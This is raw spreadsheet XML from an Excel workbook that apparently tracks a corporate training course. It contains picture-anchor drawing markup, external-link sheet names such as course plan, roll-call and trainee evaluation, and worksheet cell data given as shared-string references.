        <xdr:cNvPr id="2" name="Picture 1"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10511790" y="17622520"/>
          <a:ext cx="5972175" cy="2861945"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>28575</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>9526</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>3362325</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>1906</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="Picture 2"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5895975" y="30893385"/>
          <a:ext cx="7768590" cy="3284220"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>28576</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>9524</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>19051</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>5200649</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="Picture 3"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId3"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5895975" y="25692100"/>
          <a:ext cx="4425315" cy="5191125"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>47625</xdr:colOff>
      <xdr:row>22</xdr:row>
      <xdr:rowOff>190499</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>6639845</xdr:colOff>
      <xdr:row>22</xdr:row>
      <xdr:rowOff>4086224</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="Picture 4"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId4"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10349865" y="82108675"/>
          <a:ext cx="6591935" cy="3895725"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>23</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>6677957</xdr:colOff>
      <xdr:row>23</xdr:row>
      <xdr:rowOff>4182059</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="6" name="Picture 5"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId5"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10302240" y="87119460"/>
          <a:ext cx="6677660" cy="4181475"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>25</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>39078</xdr:colOff>
      <xdr:row>25</xdr:row>
      <xdr:rowOff>2829320</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="7" name="Picture 6"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId6"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10302240" y="97074990"/>
          <a:ext cx="7209155" cy="2828925"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>152399</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>6915150</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>3771900</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="8" name="Picture 7"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId7"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10454005" y="111785400"/>
          <a:ext cx="6763385" cy="3771900"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>53341</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>2065021</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>3985261</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>4716781</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="9" name="Picture 8"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId8"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5920740" y="36240720"/>
          <a:ext cx="3931920" cy="2651760"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>22860</xdr:colOff>
      <xdr:row>39</xdr:row>
      <xdr:rowOff>1706880</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>6096000</xdr:colOff>
      <xdr:row>41</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="10" name="Picture 9"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId9"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10325100" y="124465080"/>
          <a:ext cx="6073140" cy="23241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19050</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>4076700</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>3219450</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Picture 1"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10882630" y="375285"/>
          <a:ext cx="4057650" cy="320992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0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>369571</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>9524</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Picture 1"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7303770" cy="3849370"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>238125</xdr:colOff>
      <xdr:row>18</xdr:row>
      <xdr:rowOff>114301</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>17145</xdr:colOff>
      <xdr:row>39</xdr:row>
      <xdr:rowOff>171451</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="Picture 2"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="238125" y="3771900"/>
          <a:ext cx="6713220" cy="3897630"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>12</xdr:col>
      <xdr:colOff>1247775</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>24</xdr:col>
      <xdr:colOff>372702</xdr:colOff>
      <xdr:row>37</xdr:row>
      <xdr:rowOff>115353</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="Picture 3"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId3"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="12502515" y="0"/>
          <a:ext cx="8961755" cy="7247255"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>6</xdr:col>
      <xdr:colOff>430530</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>14</xdr:col>
      <xdr:colOff>157188</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>149151</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="Picture 4"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId4"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7981950" y="2689860"/>
          <a:ext cx="7094855" cy="3859530"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>11</xdr:col>
      <xdr:colOff>259081</xdr:colOff>
      <xdr:row>37</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>17</xdr:col>
      <xdr:colOff>106681</xdr:colOff>
      <xdr:row>40</xdr:row>
      <xdr:rowOff>2682240</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="6" name="Picture 5"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId5"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10896600" y="7239000"/>
          <a:ext cx="5981700" cy="3124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8440P560M\AppData\Local\Microsoft\Windows\Temporary%20Internet%20Files\Content.Outlook\NZEOHYAL\Template_Fresher%20Management%20Lis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FPT%20SOFTWARE\1.FRESHER\2017\FR_JAVA_HN17_05\FR_JAVA_HN17_05_Training%20Delivery%20Plan_v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10\Wip\Classes\HCD_Fresher\FR-HN17\FR-HN17_Course%20Plan_v0%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R-HN19_Management%20List%20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huelt\Desktop\In.2013_Course%20Management_v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Course plan"/>
      <sheetName val="Course Calendar"/>
      <sheetName val="Registration"/>
      <sheetName val="Roll-Calls"/>
      <sheetName val="Topic GPAs"/>
      <sheetName val="&lt;TopicName1&gt;_Mark"/>
      <sheetName val="Trainee Evaluation"/>
      <sheetName val="Course Feedback"/>
      <sheetName val="Trainer Effort &amp; Evaluation"/>
      <sheetName val="Preparation"/>
      <sheetName val="Trainee Evaluation Guides"/>
      <sheetName val="EvalGuides (VN)"/>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uideline"/>
      <sheetName val="Overall plan"/>
      <sheetName val="Budget Estimation &amp; Tracking"/>
      <sheetName val="Registration list"/>
      <sheetName val="Training Calendar"/>
      <sheetName val="Training Calendar Overview"/>
      <sheetName val="Event log"/>
      <sheetName val="Training Feedback"/>
      <sheetName val="Trainer Effort &amp; Evaluation"/>
      <sheetName val="Closure report"/>
      <sheetName val="Preparation"/>
      <sheetName val="Reference"/>
      <sheetName val="Record of changes"/>
      <sheetName val="Draf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lan"/>
      <sheetName val="Budgets"/>
      <sheetName val="TRN Calendar"/>
      <sheetName val="Mgnt Calendar"/>
      <sheetName val="Registration"/>
      <sheetName val="Diary"/>
      <sheetName val="Roll-Call"/>
      <sheetName val="Feedbacks"/>
      <sheetName val="Marks"/>
      <sheetName val="CP-MMM"/>
      <sheetName val="Trainer Effort"/>
      <sheetName val="CP-Gui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lan"/>
      <sheetName val="Budgets"/>
      <sheetName val="TRN Calendar"/>
      <sheetName val="Registration "/>
      <sheetName val="Diary"/>
      <sheetName val="Roll-Call"/>
      <sheetName val="Feedbacks "/>
      <sheetName val="Marks"/>
      <sheetName val="Trainer Effort"/>
      <sheetName val="Mgnt Calendar"/>
      <sheetName val="Gui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lan"/>
      <sheetName val="Sheet1"/>
      <sheetName val="Timeline"/>
      <sheetName val="Schedule + Budget"/>
      <sheetName val="Diary"/>
      <sheetName val="Feedbacks  "/>
      <sheetName val="Trainer Effort &amp; Evaluation"/>
      <sheetName val="DayParam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158"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <pane xSplit="6" ySplit="3" topLeftCell="K116" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F125" sqref="F125"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.11111111111111" defaultRowHeight="13.8"/>
  <cols>
    <col min="1" max="1" width="1.11111111111111" style="30" customWidth="1"/>
    <col min="2" max="2" width="6.88888888888889" style="30" customWidth="1"/>
    <col min="3" max="3" width="30.6666666666667" style="30" customWidth="1"/>
    <col min="4" max="4" width="9.44444444444444" style="102" customWidth="1"/>
    <col min="5" max="5" width="7.66666666666667" style="102" customWidth="1"/>
    <col min="6" max="6" width="54.1111111111111" style="102" customWidth="1"/>
    <col min="7" max="7" width="16.5555555555556" style="30" customWidth="1"/>
    <col min="8" max="8" width="6.88888888888889" style="30" customWidth="1"/>
    <col min="9" max="10" width="6.44444444444444" style="30" customWidth="1"/>
    <col min="11" max="11" width="37.1111111111111" style="30" customWidth="1"/>
    <col min="12" max="16384" width="9.11111111111111" style="30"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:13">
      <c r="B1" s="31" t="s">
        <v>0</v>
      </c>
      <c r="D1" s="103"/>
    </row>
    <row r="2" s="28" customFormat="1" ht="22.5" customHeight="1" spans="2:13">
      <c r="B2" s="32" t="s">
        <v>1</v>
      </c>
      <c r="C2" s="32" t="s">
        <v>2</v>
      </c>
      <c r="D2" s="32" t="s">
        <v>3</v>
      </c>
      <c r="E2" s="32" t="s">
        <v>4</v>
      </c>
      <c r="F2" s="32" t="s">
        <v>5</v>
      </c>
      <c r="G2" s="32" t="s">
        <v>6</v>
      </c>
      <c r="H2" s="18" t="s">
        <v>7</v>
      </c>
      <c r="I2" s="33" t="s">
        <v>8</v>
      </c>
      <c r="J2" s="34"/>
      <c r="K2" s="18" t="s">
        <v>9</v>
      </c>
      <c r="L2" s="32" t="s">
        <v>10</v>
      </c>
      <c r="M2" s="32" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="3" s="28" customFormat="1" ht="22.5" customHeight="1" spans="2:13">
      <c r="B3" s="35"/>
      <c r="C3" s="35"/>
      <c r="D3" s="35"/>
      <c r="E3" s="35"/>
      <c r="F3" s="35"/>
      <c r="G3" s="35"/>
      <c r="H3" s="104"/>
      <c r="I3" s="18" t="s">
        <v>12</v>
      </c>
      <c r="J3" s="18" t="s">
        <v>13</v>
      </c>
      <c r="K3" s="104"/>
      <c r="L3" s="35"/>
      <c r="M3" s="35"/>
    </row>
    <row r="4" ht="17.25" customHeight="1" spans="2:13">
      <c r="B4" s="39" t="s">
        <v>14</v>
      </c>
      <c r="C4" s="123" t="s">
        <v>15</v>
      </c>
      <c r="D4" s="124" t="s">
        <v>16</v>
      </c>
      <c r="E4" s="105" t="s">
        <v>17</v>
      </c>
      <c r="F4" s="106" t="s">
        <v>18</v>
      </c>
      <c r="G4" s="107"/>
      <c r="H4" s="107"/>
      <c r="I4" s="107"/>
      <c r="J4" s="108"/>
      <c r="K4" s="51"/>
      <c r="L4" s="108"/>
      <c r="M4" s="108"/>
    </row>
    <row r="5" ht="17.25" customHeight="1" spans="2:13">
      <c r="B5" s="45" t="s">
        <v>19</v>
      </c>
      <c r="C5" s="61"/>
      <c r="D5" s="125" t="s">
        <v>16</v>
      </c>
      <c r="E5" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F5" s="110" t="s">
        <v>20</v>
      </c>
      <c r="G5" s="79"/>
      <c r="H5" s="79"/>
      <c r="I5" s="79"/>
      <c r="J5" s="80"/>
      <c r="K5" s="80"/>
      <c r="L5" s="80"/>
      <c r="M5" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="6" ht="17.25" customHeight="1" spans="2:13">
      <c r="B6" s="45" t="s">
        <v>22</v>
      </c>
      <c r="C6" s="61"/>
      <c r="D6" s="125" t="s">
        <v>16</v>
      </c>
      <c r="E6" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F6" s="110" t="s">
        <v>24</v>
      </c>
      <c r="G6" s="79"/>
      <c r="H6" s="79"/>
      <c r="I6" s="79"/>
      <c r="J6" s="80"/>
      <c r="K6" s="80"/>
      <c r="L6" s="80"/>
      <c r="M6" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="7" ht="17.25" customHeight="1" spans="2:13">
      <c r="B7" s="45" t="s">
        <v>25</v>
      </c>
      <c r="C7" s="61"/>
      <c r="D7" s="125" t="s">
        <v>16</v>
      </c>
      <c r="E7" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F7" s="109" t="s">
        <v>26</v>
      </c>
      <c r="G7" s="79"/>
      <c r="H7" s="79"/>
      <c r="I7" s="79"/>
      <c r="J7" s="80"/>
      <c r="K7" s="80"/>
      <c r="L7" s="80"/>
      <c r="M7" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="8" ht="17.25" customHeight="1" spans="2:13">
      <c r="B8" s="45" t="s">
        <v>27</v>
      </c>
      <c r="C8" s="61"/>
      <c r="D8" s="125" t="s">
        <v>16</v>
      </c>
      <c r="E8" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F8" s="110" t="s">
        <v>28</v>
      </c>
      <c r="G8" s="79"/>
      <c r="H8" s="79"/>
      <c r="I8" s="79"/>
      <c r="J8" s="80"/>
      <c r="K8" s="80"/>
      <c r="L8" s="80"/>
      <c r="M8" s="80"/>
    </row>
    <row r="9" ht="27.6" spans="2:13">
      <c r="B9" s="45" t="s">
        <v>29</v>
      </c>
      <c r="C9" s="61"/>
      <c r="D9" s="125" t="s">
        <v>16</v>
      </c>
      <c r="E9" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F9" s="110" t="s">
        <v>30</v>
      </c>
      <c r="G9" s="79"/>
      <c r="H9" s="79"/>
      <c r="I9" s="79"/>
      <c r="J9" s="80"/>
      <c r="K9" s="80"/>
      <c r="L9" s="80"/>
      <c r="M9" s="80"/>
    </row>
    <row r="10" ht="20.25" customHeight="1" spans="2:13">
      <c r="B10" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C10" s="66"/>
      <c r="D10" s="126" t="s">
        <v>16</v>
      </c>
      <c r="E10" s="111" t="s">
        <v>23</v>
      </c>
      <c r="F10" s="112" t="s">
        <v>32</v>
      </c>
      <c r="G10" s="113"/>
      <c r="H10" s="113"/>
      <c r="I10" s="113"/>
      <c r="J10" s="114"/>
      <c r="K10" s="114"/>
      <c r="L10" s="114"/>
      <c r="M10" s="114"/>
    </row>
    <row r="11" ht="16.5" customHeight="1" spans="2:13">
      <c r="B11" s="39" t="s">
        <v>33</v>
      </c>
      <c r="C11" s="123" t="s">
        <v>34</v>
      </c>
      <c r="D11" s="124" t="s">
        <v>35</v>
      </c>
      <c r="E11" s="105" t="s">
        <v>17</v>
      </c>
      <c r="F11" s="106" t="s">
        <v>36</v>
      </c>
      <c r="G11" s="107"/>
      <c r="H11" s="107"/>
      <c r="I11" s="107"/>
      <c r="J11" s="108"/>
      <c r="K11" s="108"/>
      <c r="L11" s="108"/>
      <c r="M11" s="108"/>
    </row>
    <row r="12" ht="16.5" customHeight="1" spans="2:13">
      <c r="B12" s="45" t="s">
        <v>37</v>
      </c>
      <c r="C12" s="61"/>
      <c r="D12" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E12" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F12" s="110" t="s">
        <v>38</v>
      </c>
      <c r="G12" s="79"/>
      <c r="H12" s="79"/>
      <c r="I12" s="79"/>
      <c r="J12" s="80"/>
      <c r="K12" s="80"/>
      <c r="L12" s="80"/>
      <c r="M12" s="80"/>
    </row>
    <row r="13" ht="16.5" customHeight="1" spans="2:13">
      <c r="B13" s="45" t="s">
        <v>39</v>
      </c>
      <c r="C13" s="61"/>
      <c r="D13" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E13" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F13" s="110" t="s">
        <v>40</v>
      </c>
      <c r="G13" s="79"/>
      <c r="H13" s="79"/>
      <c r="I13" s="79"/>
      <c r="J13" s="80"/>
      <c r="K13" s="80"/>
      <c r="L13" s="80"/>
      <c r="M13" s="80"/>
    </row>
    <row r="14" ht="16.5" customHeight="1" spans="2:13">
      <c r="B14" s="45" t="s">
        <v>41</v>
      </c>
      <c r="C14" s="61"/>
      <c r="D14" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E14" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F14" s="110" t="s">
        <v>42</v>
      </c>
      <c r="G14" s="79"/>
      <c r="H14" s="79"/>
      <c r="I14" s="79"/>
      <c r="J14" s="80"/>
      <c r="K14" s="80"/>
      <c r="L14" s="80"/>
      <c r="M14" s="80"/>
    </row>
    <row r="15" ht="16.5" customHeight="1" spans="2:13">
      <c r="B15" s="45" t="s">
        <v>43</v>
      </c>
      <c r="C15" s="61"/>
      <c r="D15" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E15" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F15" s="110" t="s">
        <v>44</v>
      </c>
      <c r="G15" s="79"/>
      <c r="H15" s="79"/>
      <c r="I15" s="79"/>
      <c r="J15" s="80"/>
      <c r="K15" s="80"/>
      <c r="L15" s="80"/>
      <c r="M15" s="80"/>
    </row>
    <row r="16" ht="16.5" customHeight="1" spans="2:13">
      <c r="B16" s="45" t="s">
        <v>45</v>
      </c>
      <c r="C16" s="61"/>
      <c r="D16" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E16" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F16" s="110" t="s">
        <v>46</v>
      </c>
      <c r="G16" s="79"/>
      <c r="H16" s="79"/>
      <c r="I16" s="79"/>
      <c r="J16" s="80"/>
      <c r="K16" s="80"/>
      <c r="L16" s="80"/>
      <c r="M16" s="80"/>
    </row>
    <row r="17" ht="16.5" customHeight="1" spans="2:13">
      <c r="B17" s="45" t="s">
        <v>47</v>
      </c>
      <c r="C17" s="61"/>
      <c r="D17" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E17" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F17" s="110" t="s">
        <v>48</v>
      </c>
      <c r="G17" s="79"/>
      <c r="H17" s="79"/>
      <c r="I17" s="79"/>
      <c r="J17" s="80"/>
      <c r="K17" s="80"/>
      <c r="L17" s="80"/>
      <c r="M17" s="80"/>
    </row>
    <row r="18" ht="16.5" customHeight="1" spans="2:13">
      <c r="B18" s="45" t="s">
        <v>49</v>
      </c>
      <c r="C18" s="61"/>
      <c r="D18" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E18" s="109" t="s">
        <v>17</v>
      </c>
      <c r="F18" s="110" t="s">
        <v>50</v>
      </c>
      <c r="G18" s="79"/>
      <c r="H18" s="79"/>
      <c r="I18" s="79"/>
      <c r="J18" s="80"/>
      <c r="K18" s="80"/>
      <c r="L18" s="80"/>
      <c r="M18" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="19" ht="16.5" customHeight="1" spans="2:13">
      <c r="B19" s="45" t="s">
        <v>51</v>
      </c>
      <c r="C19" s="61"/>
      <c r="D19" s="125" t="s">
        <v>35</v>
      </c>
      <c r="E19" s="109" t="s">
        <v>23</v>
      </c>
      <c r="F19" s="110" t="s">
        <v>52</v>
      </c>
      <c r="G19" s="79"/>
      <c r="H19" s="79"/>
      <c r="I19" s="79"/>
      <c r="J19" s="80"/>
      <c r="K19" s="80"/>
      <c r="L19" s="80"/>
      <c r="M19" s="80" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="20" ht="16.5" customHeight="1" spans="2:13">
      <c r="B20" s="45" t="s">
        <v>53</v>
      </c>
      <c r="C20" s="61"/>
      <c r="D20" s="125" t="s">
